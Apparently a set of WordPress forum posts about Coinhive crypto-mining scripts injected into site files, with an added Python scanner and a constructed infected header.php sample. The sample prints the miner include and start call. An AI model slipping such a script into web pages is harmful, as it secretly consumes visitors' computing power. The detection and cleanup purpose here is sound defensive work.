I’m trying to help a new client, who has come to me with a very slow website. I realised they didn’t have any security (and never have – it’s an old site!) on their site, so have installed Wordfence which I use on all my sites.
I’ve done a scan and it says:
This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: new CoinHive.Anonymous(‘TnKJQivLdI92CHM5VDumySeVWinv2yfL’. The infection type is: Browser-based crypto currency miner..
The file is the header.php – I can see the coinhive links/code – but am not sure where from and where to delete it. Or can Wordfence help with this? My client is having a new site built by someone else so doesn’t want the pro version at this point in time. But can the free version help?
OR if I paste the code in the header here – can someone let me know which part I can delete?
I’ve already deleted a file Wordfence flagged up. I’ve taken backups all the way…
Thanks for any help in advance…

I have several domains running WordPress. Recently I have noticed a performance deterioration on them. My websites remain down for several minutes every day. There is hardly any visitor on these (not more than a 100/day, since these are mainly personal websites, hardly promoted). My website host keeps on telling me to “optimize my website”, which I don’t know how to, since, as my handle suggests, I am newest
Running a website speed test via :
I notice that domain coinhive.com and associated scripts such as https://coinhive.com/lib/coinhive.min.js are frequently being accessed/run when I run a speedtest on these websites. The net tells me these are for mining some crypto currency via some plugins.
I don’t remember installing any such plugin and am wondering how coinhive got in my sites and is it responsible for deterioration/outages I have been experiencing lately.
Some of my WordPress sites that have this issue are:
Any help/advice would be highly appreciated. Thanks!
also see the forum post here
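
A small scanner for the two strings named in the posts above (the `new CoinHive.Anonymous(` call that Wordfence matched and the `coinhive.com/lib/coinhive.min.js` include), added here as an example; it is not code from Wordfence or from either poster. The function names, the sample `header.php` and its placeholder site key are constructed for illustration.

```python
import re
from pathlib import Path

# Indicators taken from the posts: the miner constructor Wordfence matched
# and the library URL seen during the speed test.
INDICATORS = {
    "constructor": re.compile(r"new\s+CoinHive\.\w+\s*\(", re.I),
    "library": re.compile(r"coinhive\.com/lib/[\w.-]+\.js", re.I),
}

def scan_text(text):
    """Return (line_number, [indicator names], stripped line) for each hit."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        names = [n for n, rx in INDICATORS.items() if rx.search(line)]
        if names:
            hits.append((no, names, line.strip()[:120]))
    return hits

def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Scan theme/plugin files under root; returns {path: hits}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample of an infected header.php (site key is a placeholder).
SAMPLE_HEADER = """<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<?php wp_head(); ?>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY_PLACEHOLDER');
  miner.start();
</script>
</head>
"""

if __name__ == "__main__":
    for no, names, line in scan_text(SAMPLE_HEADER):
        print(f"header.php:{no}: {', '.join(names)}: {line}")
```

The flagged lines mark where the injection sits; the `<script>` block around them is part of the same insert, so compare the whole region against a clean copy of the theme before deleting anything.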

personally, i do not feel this is necessarily a bad thing and, actually, i see this tech in general as potentially excellent way to monetize web content without having to subject visitors to ads or begging for donations
HOWEVER, the way that every single one of the devs are implementing the Coin Hive miner in all of the WP plugs as of this writing is HIGHLY UNETHICAL in my opinion insomuch as they all are allowing the mining script to run WITHOUT even making the visitor aware, much less offering an opt-in solution
Coin Hive seems like they have a solid ethic and a very good privacy policy and i think they’re in this for the right reasons, one of which is to de-clutter the web of annoying ads and other unethical monetization schemes
here’s some quotes from the Coin Hive blog (The Way Forward), emphasis added…
Our goal was to offer a viable alternative to intrusive and annoying ads that litter so many websites today. These ads are not only a distraction to end users, but also provide notoriously unpredictable and non-transparent revenue numbers. We set out to change that.
We’re a bit saddened to see that some of our customers integrate Coinhive into their pages without disclosing to their users what’s going on, let alone asking for their permission. We believe there’s so much more potential for our solution, but we have to be respectful to our end users.
It’s probably too late to do anything about the adblockers that already prevent our current JavaScript from loading. Instead, we will focus on a new implementation that requires an explicit opt-in from the end user to run. We will verify this opt-in on our servers and will implement it in a way that it can not be circumvented. We will pledge to keep the opt-in intact at all times, without exceptions.
with that said, i would very much like to ask WordPress to please consider disallowing ANY cryptocurrency mining plugin for WP which utilizes the computing power of site visitors without asking the visitors’ permission, as in opt-in, not opt-out
i see this tech as an excellent opportunity and perhaps a revolutionary change in how content is monetized, but any developer who acts unethically by employing such tech without asking permission first is, i think, a great threat to the future of something that may have enormous potential
already AV companies and ad-block devs are blacklisting these mining scripts because of unethical developers such as those offering the WP plugs i spoke of